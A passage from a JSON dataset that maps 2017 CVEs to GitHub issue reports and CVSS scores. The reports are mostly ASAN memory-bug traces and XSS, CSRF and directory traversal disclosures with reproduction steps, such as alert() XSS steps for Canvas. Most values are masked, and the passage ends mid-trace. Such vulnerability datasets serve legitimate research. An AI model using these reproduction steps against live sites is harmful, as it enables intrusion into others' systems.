  14412. "description": "Use after free in APITAG Use after free in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
  14413. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14414. "severity": "MEDIUM",
  14415. "baseScore": 5.5,
  14416. "impactScore": 3.6,
  14417. "exploitabilityScore": 1.8
  14418. },
  14419. {
  14420. "CVE_ID": "CVE-2017-7962",
  14421. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/15",
  14422. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/15",
  14423. "Repo_new": "jsummers/imageworsener",
  14424. "Issue_Created_At": "2017-04-12T10:38:59Z",
  14425. "description": "divide by zero in iwgif_record_pixel (imagew gif.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14426. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14427. "severity": "MEDIUM",
  14428. "baseScore": 5.5,
  14429. "impactScore": 3.6,
  14430. "exploitabilityScore": 1.8
  14431. },
  14432. {
  14433. "CVE_ID": "CVE-2017-7982",
  14434. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/103",
  14435. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/103",
  14436. "Repo_new": "libimobiledevice/libplist",
  14437. "Issue_Created_At": "2017-04-18T07:06:33Z",
  14438. "description": "heap buffer overflow in APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c8 at pc NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG b NUMBERTAG sp NUMBERTAG bfb NUMBERTAG b4c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c8 thread T NUMBERTAG b7 in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG bbab in main PATHTAG NUMBERTAG b5fe6a NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  14439. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14440. "severity": "MEDIUM",
  14441. "baseScore": 5.5,
  14442. "impactScore": 3.6,
  14443. "exploitabilityScore": 1.8
  14444. },
  14445. {
  14446. "CVE_ID": "CVE-2017-7992",
  14447. "Issue_Url_old": "https://github.com/hps/heartland-php/issues/28",
  14448. "Issue_Url_new": "https://github.com/hps/heartland-php/issues/28",
  14449. "Repo_new": "hps/heartland-php",
  14450. "Issue_Created_At": "2017-02-22T14:55:08Z",
  14451. "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to directly output user supplied data in HTTP GET parameter, this happended in the file PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET; FILETAG if $_GET contains evil js code, line NUMBERTAG will trigger untrusted code to be excuted on the browser side. So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  14452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14453. "severity": "MEDIUM",
  14454. "baseScore": 6.1,
  14455. "impactScore": 2.7,
  14456. "exploitabilityScore": 2.8
  14457. },
  14458. {
  14459. "CVE_ID": "CVE-2017-8081",
  14460. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1224",
  14461. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1224",
  14462. "Repo_new": "getsimplecms/getsimplecms",
  14463. "Issue_Created_At": "2017-04-24T18:00:49Z",
  14464. "description": "CVE NUMBERTAG generate_salt unnecessarily weak. [ ] mt_rand weak [ ] sub str sha1 to NUMBERTAG characters ( why )? we allow custom salt and it has no problems being longer than NUMBERTAG chars so i have no idea where this restriction came from. Do not see any breakage from removing it. refs NUMBERTAG",
  14465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14466. "severity": "HIGH",
  14467. "baseScore": 8.8,
  14468. "impactScore": 5.9,
  14469. "exploitabilityScore": 2.8
  14470. },
  14471. {
  14472. "CVE_ID": "CVE-2017-8101",
  14473. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/452",
  14474. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/452",
  14475. "Repo_new": "s9y/serendipity",
  14476. "Issue_Created_At": "2017-02-26T03:35:34Z",
  14477. "description": "Installation of theme is not secure with a CSRF token. version NUMBERTAG payload: URLTAG Use tag APITAG in another html to request this payload,after serendipity's admin visits it,theme will be changed.",
  14478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14479. "severity": "HIGH",
  14480. "baseScore": 8.8,
  14481. "impactScore": 5.9,
  14482. "exploitabilityScore": 2.8
  14483. },
  14484. {
  14485. "CVE_ID": "CVE-2017-8102",
  14486. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/456",
  14487. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/456",
  14488. "Repo_new": "s9y/serendipity",
  14489. "Issue_Created_At": "2017-03-04T08:48:17Z",
  14490. "description": "stored XSS in NUMBERTAG rc NUMBERTAG create a standard editor named \"test\", APITAG NUMBERTAG write a new entry ERRORTAG APITAG NUMBERTAG then post this entry,when admin view it ,XSS occur! APITAG",
  14491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14492. "severity": "MEDIUM",
  14493. "baseScore": 5.4,
  14494. "impactScore": 2.7,
  14495. "exploitabilityScore": 2.3
  14496. },
  14497. {
  14498. "CVE_ID": "CVE-2017-8109",
  14499. "Issue_Url_old": "https://github.com/saltstack/salt/issues/40075",
  14500. "Issue_Url_new": "https://github.com/saltstack/salt/issues/40075",
  14501. "Repo_new": "saltstack/salt",
  14502. "Issue_Created_At": "2017-03-16T11:11:12Z",
  14503. "description": "salt ssh temporary files insecure permissions. When salt ssh sets up it's temporary location (eg. APITAG ), the files contained (eg. ERRORTAG ) are NUMBERTAG Some of these files may well contain sensitive data such as private keys (which when installed will be set to NUMBERTAG by the state). The permissions may be inherited from the salt master, but if these files come from a backend such as gitfs, they seem to have NUMBERTAG in the master gitfs cache (which in itself is a problem!) Run the following state with APITAG and check the files located in the temporary directory on the remote host. The APITAG file will be CODETAG Salt Version: Salt: APITAG Dependency Versions: cffi NUMBERTAG cherrypy NUMBERTAG dateutil: Not Installed gitdb: Not Installed gitpython: Not Installed ioflo: Not Installed Jinja NUMBERTAG libgit NUMBERTAG libnacl: Not Installed APITAG NUMBERTAG Mako: Not Installed msgpack pure: Not Installed msgpack python NUMBERTAG mysql python: Not Installed pycparser NUMBERTAG pycrypto NUMBERTAG pygit NUMBERTAG Python NUMBERTAG default, No NUMBERTAG python gnupg: Not Installed APITAG NUMBERTAG APITAG NUMBERTAG RAET: Not Installed smmap: Not Installed timelib: Not Installed Tornado NUMBERTAG ZMQ NUMBERTAG System Versions: dist: centos NUMBERTAG Core machine NUMBERTAG release NUMBERTAG APITAG system: Linux version: APITAG Linu NUMBERTAG Core `",
  14504. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  14505. "severity": "HIGH",
  14506. "baseScore": 7.8,
  14507. "impactScore": 5.9,
  14508. "exploitabilityScore": 1.8
  14509. },
  14510. {
  14511. "CVE_ID": "CVE-2017-8115",
  14512. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13432",
  14513. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13432",
  14514. "Repo_new": "modxcms/revolution",
  14515. "Issue_Created_At": "2017-04-21T15:59:20Z",
  14516. "description": "Directory traversal vulnerability in FILETAG , please confirm!. [ ] Summary Hello, i found a directory traversal vulnerability in FILETAG . The vulnerability is due to defects in processing search parameters. the reproduction is below: Step to reproduce Accessing the FILETAG in POST mode, the POST parameters are PATHTAG e.g. URL: FILETAG POST: PATHTAG Vulnerability details please refer to the following links: link: URLTAG pass: vbyp Observed behavior It will causes the system directory information to leak Expected behavior It will causes the system directory information to leak Environment MODX version NUMBERTAG",
  14517. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  14518. "severity": "MEDIUM",
  14519. "baseScore": 5.3,
  14520. "impactScore": 1.4,
  14521. "exploitabilityScore": 3.9
  14522. },
  14523. {
  14524. "CVE_ID": "CVE-2017-8289",
  14525. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/6840",
  14526. "Issue_Url_new": "https://github.com/riot-os/riot/issues/6840",
  14527. "Repo_new": "riot-os/riot",
  14528. "Issue_Created_At": "2017-04-01T10:14:27Z",
  14529. "description": "Stack Buffer Overflow Potential Denial of Service. I'd like to report a stack buffer overflow bug within RIOT without making it publicly known. I'm still doing some testing at the device level but a bug definitely exists, who is best to discuss with privately?",
  14530. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14531. "severity": "CRITICAL",
  14532. "baseScore": 9.8,
  14533. "impactScore": 5.9,
  14534. "exploitabilityScore": 3.9
  14535. },
  14536. {
  14537. "CVE_ID": "CVE-2017-8294",
  14538. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/646",
  14539. "Issue_Url_new": "https://github.com/virustotal/yara/issues/646",
  14540. "Repo_new": "virustotal/yara",
  14541. "Issue_Created_At": "2017-04-26T05:33:55Z",
  14542. "description": "Out of bounds read in APITAG Out of bounds read in APITAG Git HEAD: APITAG FILETAG Command: APITAG ASAN: ERRORTAG",
  14543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14544. "severity": "HIGH",
  14545. "baseScore": 7.5,
  14546. "impactScore": 3.6,
  14547. "exploitabilityScore": 3.9
  14548. },
  14549. {
  14550. "CVE_ID": "CVE-2017-8298",
  14551. "Issue_Url_old": "https://github.com/cnvs/canvas/issues/331",
  14552. "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/331",
  14553. "Repo_new": "austintoddj/canvas",
  14554. "Issue_Created_At": "2017-04-23T00:11:49Z",
  14555. "description": "XSS vulnerability in creating Posts. Exploit Title: Stored XSS vulnerability possible in creating posts in canvas APITAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: XSS allows an attacker to run arbitrary scripts on the users browser. Exploit POC: APITAG used_: Chrome version NUMBERTAG Login as a user/ admin user NUMBERTAG Go to Posts > Add New NUMBERTAG The title and the content fields are vulnerable to stored XSS NUMBERTAG Enter APITAG alert('XSS in title') APITAG in the Title,'some subtitle' in subtitle and APITAG alert('XSS in content') APITAG in the content field NUMBERTAG Publish the post NUMBERTAG Now, navigate to the APITAG posts\" page. The script in the 'title' field will have executed and you will see an alert box with 'XSS in title NUMBERTAG Now go to the preview of this post by clicking on the magnifying glass next to the newly created post NUMBERTAG The script that we had entered in the content will now have executed and you will see an alert box with 'XSS in content'. References: URLTAG Screenshots: APITAG NUMBERTAG Creating a post. APITAG NUMBERTAG SS on APITAG posts\" page. APITAG NUMBERTAG Post created. APITAG NUMBERTAG SS on the post page. APITAG NUMBERTAG Post page. Impact: An attacker can execute arbitrary script on an unsuspecting user's browser. For instance Since, there is no seperation between the posts created by a privileged and an unprivileged user, an unprivileged user can create a post with script to steal the administrator's cookies or perform an action on his behalf. Mitigation: Input should be properly validated before storing in the database and output from the database should also be properly encoded before displaying it to the user.",
  14556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14557. "severity": "MEDIUM",
  14558. "baseScore": 5.4,
  14559. "impactScore": 2.7,
  14560. "exploitabilityScore": 2.3
  14561. },
  14562. {
  14563. "CVE_ID": "CVE-2017-8301",
  14564. "Issue_Url_old": "https://github.com/libressl-portable/portable/issues/307",
  14565. "Issue_Url_new": "https://github.com/libressl/portable/issues/307",
  14566. "Repo_new": "libressl/portable",
  14567. "Issue_Created_At": "2017-04-25T17:16:04Z",
  14568. "description": "Some nginx TLS tests started failing with APITAG NUMBERTAG but not with NUMBERTAG After we updated APITAG from NUMBERTAG to NUMBERTAG in Alpine Linux, we have noticed that some TLS related tests in nginx (both NUMBERTAG and NUMBERTAG started failing. Moreover, most of them fail because nginx accepted certificate that should be rejected! That\u2019s pretty bad regression. We\u2019re not sure if the problem is in APITAG nginx or nginx tests, so reporting it to both. CODETAG Complete log: FILETAG /cc APITAG",
  14569. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N",
  14570. "severity": "MEDIUM",
  14571. "baseScore": 5.3,
  14572. "impactScore": 3.6,
  14573. "exploitabilityScore": 1.6
  14574. },
  14575. {
  14576. "CVE_ID": "CVE-2017-8302",
  14577. "Issue_Url_old": "https://github.com/blueriver/MuraCMS/issues/2577",
  14578. "Issue_Url_new": "https://github.com/blueriver/muracms/issues/2577",
  14579. "Repo_new": "blueriver/MuraCMS",
  14580. "Issue_Created_At": "2017-04-25T03:08:14Z",
  14581. "description": "Bug report: XSS Vulnerabilities in many arguments of APITAG Steps to reproduce NUMBERTAG Login to site management, for example FILETAG NUMBERTAG Access following URL, browser will run any scripts posted to server, for example: alert NUMBERTAG to prompt a dialog ERRORTAG ERRORTAG APITAG Environment Win7 Lucee NUMBERTAG windows Latest stable build (mura NUMBERTAG",
  14582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14583. "severity": "MEDIUM",
  14584. "baseScore": 5.4,
  14585. "impactScore": 2.7,
  14586. "exploitabilityScore": 2.3
  14587. },
  14588. {
  14589. "CVE_ID": "CVE-2017-8343",
  14590. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/444",
  14591. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/444",
  14592. "Repo_new": "imagemagick/imagemagick",
  14593. "Issue_Created_At": "2017-04-26T16:41:24Z",
  14594. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fba NUMBERTAG ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fba4b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14596. "severity": "MEDIUM",
  14597. "baseScore": 6.5,
  14598. "impactScore": 3.6,
  14599. "exploitabilityScore": 2.8
  14600. },
  14601. {
  14602. "CVE_ID": "CVE-2017-8344",
  14603. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/446",
  14604. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/446",
  14605. "Repo_new": "imagemagick/imagemagick",
  14606. "Issue_Created_At": "2017-04-26T16:44:19Z",
  14607. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f9b NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f9b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14609. "severity": "MEDIUM",
  14610. "baseScore": 6.5,
  14611. "impactScore": 3.6,
  14612. "exploitabilityScore": 2.8
  14613. },
  14614. {
  14615. "CVE_ID": "CVE-2017-8345",
  14616. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/442",
  14617. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/442",
  14618. "Repo_new": "imagemagick/imagemagick",
  14619. "Issue_Created_At": "2017-04-26T16:39:50Z",
  14620. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ada in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14622. "severity": "MEDIUM",
  14623. "baseScore": 6.5,
  14624. "impactScore": 3.6,
  14625. "exploitabilityScore": 2.8
  14626. },
  14627. {
  14628. "CVE_ID": "CVE-2017-8346",
  14629. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/440",
  14630. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/440",
  14631. "Repo_new": "imagemagick/imagemagick",
  14632. "Issue_Created_At": "2017-04-26T16:37:18Z",
  14633. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14635. "severity": "MEDIUM",
  14636. "baseScore": 6.5,
  14637. "impactScore": 3.6,
  14638. "exploitabilityScore": 2.8
  14639. },
  14640. {
  14641. "CVE_ID": "CVE-2017-8347",
  14642. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/441",
  14643. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/441",
  14644. "Repo_new": "imagemagick/imagemagick",
  14645. "Issue_Created_At": "2017-04-26T16:39:00Z",
  14646. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak 